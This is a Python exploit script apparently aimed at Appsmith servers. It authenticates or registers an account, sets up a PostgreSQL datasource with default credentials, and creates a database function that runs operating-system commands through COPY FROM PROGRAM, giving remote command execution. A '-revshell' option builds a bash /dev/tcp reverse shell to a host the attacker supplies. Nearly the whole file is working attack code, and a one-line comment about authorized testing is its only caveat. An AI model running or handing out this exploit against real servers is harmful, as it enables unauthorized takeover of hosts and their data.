#!/usr/bin/env python3
import sys, json, random, string, re, urllib3, requests
from urllib.parse import urljoin, urlencode
# Silence urllib3's warnings for the whole run.
urllib3.disable_warnings()
def rand(n=8):
    """Return a random string of ``n`` lowercase ASCII letters and digits."""
    alphabet = string.ascii_lowercase + string.digits
    return ''.join(random.choices(alphabet, k=n))
# SQL used as the body of the "setup" action.
# It creates the cmd_output table (if missing) and the plpgsql function
# exec_cmd(cmd). That function empties cmd_output, loads the output of
# `cmd` into it with COPY ... FROM PROGRAM, and returns the stored rows.
SQL_SETUP = """
CREATE TABLE IF NOT EXISTS cmd_output (line text);
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS TABLE(line text) AS $$
BEGIN
TRUNCATE TABLE cmd_output;
EXECUTE format('COPY cmd_output FROM PROGRAM %L', cmd);
RETURN QUERY SELECT t.line FROM cmd_output t;
END; $$ LANGUAGE plpgsql;
"""
def die(msg, resp=None):
    """Print an error message and terminate the script with exit status 1.

    Args:
        msg: Human-readable description of the failure.
        resp: Optional HTTP response object. When given, its status code and
            the first 300 characters of its body are printed as well.

    Raises:
        SystemExit: Always, with exit code 1.
    """
    # Diagnostics go to stderr so they never mix with regular output on stdout.
    print("ERROR:", msg, file=sys.stderr)
    if resp is not None:
        print(resp.status_code, resp.text[:300], file=sys.stderr)
    sys.exit(1)
def json_ct(r):
    """Return True when the response's Content-Type starts with application/json."""
    content_type = r.headers.get("content-type", "")
    return content_type.startswith("application/json")
def first_id(xs):
    """Return the ``"id"`` of the first element of ``xs``, or None if ``xs`` is empty."""
    if not xs:
        return None
    return xs[0]["id"]
def fetch_csrf(sess, base):
    """Try to obtain a CSRF token from the server.

    Three sources are tried in order:
      1. JSON endpoints whose body contains a ``token`` field.
      2. The ``/user/signup`` HTML page (form field or ``<meta>`` tag
         named ``_csrf``).
      3. The ``XSRF-TOKEN`` cookie, after requesting ``/api/v1/users/me``.

    Args:
        sess: HTTP session used for all requests.
        base: Base URL of the server.

    Returns:
        The token string, or None when no source yields one.
    """
    for p in ("/csrf", "/api/v1/users/csrfToken", "/api/v1/csrf"):
        r = sess.get(urljoin(base, p), headers={"Accept": "application/json"})
        if r.ok and json_ct(r) and "token" in r.text:
            return r.json().get("token")

    r = sess.get(urljoin(base, "/user/signup"))
    # The second pattern previously started with a bare "]+", which can only
    # match a literal "]" and therefore never matched a <meta> tag.
    m = re.search(r'name="_csrf"\s+value="([^"]+)"', r.text) or \
        re.search(r'<meta[^>]+name="_csrf"[^>]+content="([^"]+)"', r.text)
    if m:
        return m.group(1)

    # Last resort: this request is made only so the cookie can be read
    # from the session afterwards.
    sess.get(urljoin(base, "/api/v1/users/me"),
             headers={"X-Requested-With": "XMLHttpRequest"})
    return sess.cookies.get("XSRF-TOKEN")
def try_login(sess, base, email, pw):
    """Attempt a form login and confirm it via ``/api/v1/users/me``.

    Args:
        sess: HTTP session; it is reused for the follow-up profile request.
        base: Base URL of the server.
        email: Account e-mail, sent as the ``username`` form field.
        pw: Account password.

    Returns:
        True when the profile endpoint reports the same e-mail, else False.
    """
    print(f"[+] trying login for {email}")
    form = urlencode({"username": email, "password": pw})
    sess.post(
        urljoin(base, "/api/v1/login"),
        data=form,
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        allow_redirects=False,
    )

    # The login response itself is ignored; success is judged by the profile.
    me = sess.get(urljoin(base, "/api/v1/users/me"))
    logged_in = (
        me.ok
        and json_ct(me)
        and me.json().get("data", {}).get("email") == email
    )
    if not logged_in:
        print("[-] login failed")
        return False
    print("[+] login succeeded")
    return True
def try_signup(sess, base, email, pw):
    """Attempt to register a new account with the given credentials.

    A CSRF token is added to the form as ``_csrf`` when ``fetch_csrf``
    finds one.

    Args:
        sess: HTTP session used for the requests.
        base: Base URL of the server; also sent as the ``Origin`` header.
        email: E-mail address to register.
        pw: Password to register.

    Returns:
        True when the server answers 200, 201 or 302, else False.
    """
    print(f"[+] attempting signup with {email}")
    form = {"email": email, "password": pw}
    token = fetch_csrf(sess, base)
    if token:
        form["_csrf"] = token

    request_headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base,
        "Referer": urljoin(base, "/user/signup"),
    }
    resp = sess.post(
        urljoin(base, "/api/v1/users"),
        data=form,
        headers=request_headers,
        allow_redirects=False,
    )

    created = resp.status_code in (200, 201, 302)
    print("[+] registration succeeded" if created else "[-] registration failed")
    return created
def get_workspace(sess, base):
    """Return the id of the first workspace visible to the session.

    The workspace listing endpoints are queried first. If neither yields
    data, the ``workspaces`` / ``workspaceDTOs`` fields of the user profile
    are used. The script exits through ``die`` when nothing is found.

    Args:
        sess: Authenticated HTTP session.
        base: Base URL of the server.

    Returns:
        The ``id`` of the first workspace entry found.
    """
    for path in ("/api/v1/workspaces/home", "/api/v1/workspaces"):
        resp = sess.get(urljoin(base, path))
        if not (resp.ok and json_ct(resp)):
            continue
        listing = resp.json().get("data")
        if listing:
            return listing[0]["id"]

    # Fall back to the workspace lists embedded in the user profile.
    me = sess.get(urljoin(base, "/api/v1/users/me"))
    if me.ok and json_ct(me):
        profile = me.json().get("data", {})
        for key in ("workspaces", "workspaceDTOs"):
            entries = profile.get(key)
            if entries:
                return entries[0]["id"]

    die("no workspace found – open the UI once to finish onboarding")
def pick_environment(sess, base, ws):
    """Return an environment id for workspace ``ws``, or "" if none is available.

    The workspace's existing environments are listed first. If that yields
    nothing, creation of an environment named ``PROD`` is attempted. When
    both fail, the server is treated as a legacy build that does not use
    environment ids.

    Args:
        sess: Authenticated HTTP session.
        base: Base URL of the server.
        ws: Workspace id.

    Returns:
        The environment id, or an empty string for legacy servers.
    """
    # modern servers
    r = sess.get(urljoin(base, f"/api/v1/environments/workspaces/{ws}"))
    # json_ct guards r.json(): a 2xx reply with a non-JSON body must fall
    # through to the next strategy instead of raising a decode error.
    if r.ok and json_ct(r) and r.json().get("data"):
        return r.json()["data"][0]["id"]

    # try to create one (mid-2023 builds)
    r = sess.post(urljoin(base, "/api/v1/environments"),
                  json={"name": "PROD", "workspaceId": ws})
    if r.ok and json_ct(r) and r.json().get("data"):
        return r.json()["data"]["id"]

    # Older servers do not use environmentId
    print("[*] legacy server – operating without environmentId")
    return ""
def create_app(sess, base, ws, name):
    """Create an application and return the id of its first page.

    Two request shapes are tried in order: the workspace id as a query
    parameter, then the workspace id inside the JSON body. The script exits
    through ``die`` when neither request answers 201.

    Args:
        sess: Authenticated HTTP session.
        base: Base URL of the server.
        ws: Workspace id that should own the application.
        name: Name of the new application.

    Returns:
        The id of the first page of the created application, or None when
        the page list is empty.
    """
    attempts = (
        # Some versions take workspaceId as a query parameter ...
        (f"/api/v1/applications?workspaceId={ws}", {"name": name}),
        # ... others expect it in the JSON body.
        ("/api/v1/applications", {"name": name, "workspaceId": ws}),
    )
    for path, payload in attempts:
        r = sess.post(urljoin(base, path), json=payload)
        if r.status_code == 201:
            return first_id(r.json()["data"]["pages"])
    die("app create failed", r)
def create_action(sess, base, page_id, plugin_id, ds_id, name, body):
    """Create an action (query) on a page and return its id.

    Args:
        sess: Authenticated HTTP session.
        base: Base URL of the server.
        page_id: Page the action is attached to.
        plugin_id: Id of the plugin the action uses.
        ds_id: Id of the datasource the action runs against.
        name: Action name.
        body: Query text stored in the action configuration.

    Returns:
        The id of the created action. The script exits through ``die`` when
        the server does not answer 201.
    """
    action = {
        "name": name,
        "pageId": page_id,
        "pluginId": plugin_id,
        "datasource": {"id": ds_id},
        "actionConfiguration": {
            "pluginSpecifiedTemplates": [{"value": True}],
            "body": body,
        },
    }
    resp = sess.post(urljoin(base, "/api/v1/actions"), json=action)
    if resp.status_code == 201:
        return resp.json()["data"]["id"]
    die(f"create {name} failed", resp)
def exec_action(sess, base, aid, env, tolerant=False):
    """Execute an action and return the ``data`` part of the reply.

    The execute request is sent as multipart form data with a single
    ``executeActionDTO`` JSON part. When ``env`` is truthy it is sent as
    the ``environmentId`` header.

    Args:
        sess: Authenticated HTTP session.
        base: Base URL of the server.
        aid: Id of the action to execute.
        env: Environment id, or a falsy value to omit the header.
        tolerant: When True, HTTP errors and unsuccessful executions are
            ignored instead of terminating the script.

    Returns:
        The ``data`` value of a JSON reply, or an empty dict when the reply
        is not JSON.
    """
    request_dto = {
        "actionId": aid,
        "viewMode": False,
        "paramProperties": {},
        "analyticsProperties": {"isUserInitiated": True},
    }
    multipart = {
        "executeActionDTO": (None, json.dumps(request_dto), "application/json"),
    }

    request_headers = dict(sess.headers)
    if env:
        request_headers["environmentId"] = env

    resp = sess.post(
        urljoin(base, "/api/v1/actions/execute"),
        headers=request_headers,
        files=multipart,
    )

    strict = not tolerant
    if strict and not resp.ok:
        die(f"execute {aid} failed", resp)

    result = {}
    if json_ct(resp):
        result = resp.json().get("data", {})

    if strict and not result.get("isExecutionSuccess", False):
        die(f"action {aid} not successful", resp)
    return result
# Command-line handling.
# NOTE: run this only against systems you are authorized to test.
#
# Positional arguments: base URL, e-mail, password. They may be followed by
# either a single command (default "id") or "-revshell" plus a host and port.
USAGE = f"{sys.argv[0]} <url> <email> <password> [cmd] | -revshell <lhost> <lport>"
if len(sys.argv) < 4:
    die(USAGE)

# Only the URL gets its trailing slash removed. Stripping "/" from the e-mail
# or password would silently change credentials that end in a slash.
base = sys.argv[1].rstrip("/")
email, pw = sys.argv[2:4]

if len(sys.argv) >= 5 and sys.argv[4] == "-revshell":
    if len(sys.argv) != 7:
        die(USAGE)
    cmd = f"bash -c 'bash -i >& /dev/tcp/{sys.argv[5]}/{sys.argv[6]} 0>&1'"
    revshell = True
else:
    cmd = sys.argv[4] if len(sys.argv) >= 5 else "id"
    revshell = False
print("command:", cmd)
# One session carries cookies and default headers across every request.
sess = requests.Session()
sess.verify = False  # TLS certificate verification is turned off
sess.headers["X-Requested-By"] = "Appsmith"

# Log in with the given credentials. If that fails, try to register the
# account and log in again.
authenticated = try_login(sess, base, email, pw)
if not authenticated and try_signup(sess, base, email, pw):
    authenticated = try_login(sess, base, email, pw)
if not authenticated:
    die("authentication failed")
# Resolve the workspace and environment ids.
ws = get_workspace(sess, base)
print("workspace_id:", ws)
env = pick_environment(sess, base, ws)
print("environment_id:", env or "")

# Find the id of the first plugin whose name starts with "postgres".
pg = None
for plugin_path in ("/api/v1/plugins", "/api/v1/plugins/default/icons"):
    plugin_resp = sess.get(urljoin(base, plugin_path))
    if not (plugin_resp.ok and json_ct(plugin_resp)):
        continue
    pg = next(
        (
            plugin["id"]
            for plugin in plugin_resp.json().get("data", [])
            if plugin.get("name", "").lower().startswith("postgres")
        ),
        None,
    )
    if pg:
        break
if not pg:
    die("postgres plugin not found")
print("postgres_plugin_id:", pg)

# Use the first page of the first existing application, or create a new
# application with a random name when none exists.
apps = sess.get(urljoin(base, "/api/v1/applications")).json().get("data", [])
if apps:
    page_id = first_id(apps[0]["pages"])
else:
    page_id = create_app(sess, base, ws, f"auto_{rand()}")
print("page_id:", page_id)
# Datasource storages are keyed by environment id; the workspace id is used
# as the key when no environment id is available.
env_key = env or ws

# Connection settings for the PostgreSQL datasource.
conf = {
    "authentication": {
        "databaseName": "postgres",
        "username": "postgres",
        "password": "postgres",
    },
    "endpoints": [{"host": "localhost", "port": "5432"}],
    "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
}
storage = {"isConfigured": True, "datasourceConfiguration": conf}
ds_body = {
    "name": f"pg_{rand()}",
    "pluginId": pg,
    "workspaceId": ws,
    "datasourceStorages": {env_key: storage},
}

res = sess.post(urljoin(base, "/api/v1/datasources"), json=ds_body)
if res.status_code != 201:
    die("datasource create", res)
ds_id = res.json()["data"]["id"]
print("datasource_id:", ds_id)

# Test DB connectivity; skipped when there is no environment id (legacy).
if not env:
    print("postgres test skipped (legacy)")
else:
    test_request = {
        "datasourceId": ds_id,
        "environmentId": env,
        "datasourceConfiguration": conf,
        "pluginId": pg,
        "workspaceId": ws,
    }
    test_resp = sess.post(urljoin(base, "/api/v1/datasources/test"),
                          json=test_request)
    j = test_resp.json().get("data", {})
    if not j.get("valid") and not j.get("success"):
        die("datasource test failed")
    print("postgres reachable")
# Create both actions up front: one that installs the SQL helper objects and
# one that calls exec_cmd() with the requested command.
setup_id = create_action(sess, base, page_id, pg, ds_id,
                         "setup_cmd_objects", SQL_SETUP)

# Double single quotes so the command stays inside the SQL string literal.
# The escaping is done outside the f-string because backslashes inside an
# f-string replacement field are a SyntaxError before Python 3.12.
escaped_cmd = cmd.replace("'", "''")
run_sql = f"SELECT * FROM exec_cmd('{escaped_cmd}');"
run_id = create_action(sess, base, page_id, pg, ds_id,
                       "run_command", run_sql)

exec_action(sess, base, setup_id, env)
print("setup executed")

if revshell:
    # Failures are tolerated in this mode and the result is not inspected.
    exec_action(sess, base, run_id, env, tolerant=True)
    print("attempted to execute reverse shell")
else:
    out = exec_action(sess, base, run_id, env)
    rows = out.get("body", [])
    if isinstance(rows, list) and all(isinstance(x, dict) for x in rows):
        # Expected shape: a list of row dicts, printed with line numbers.
        for i, row in enumerate(rows, 1):
            print(f"{i:03}: {row.get('line')}")
    else:
        # Any other shape is dumped as JSON.
        print(json.dumps(rows, indent=2))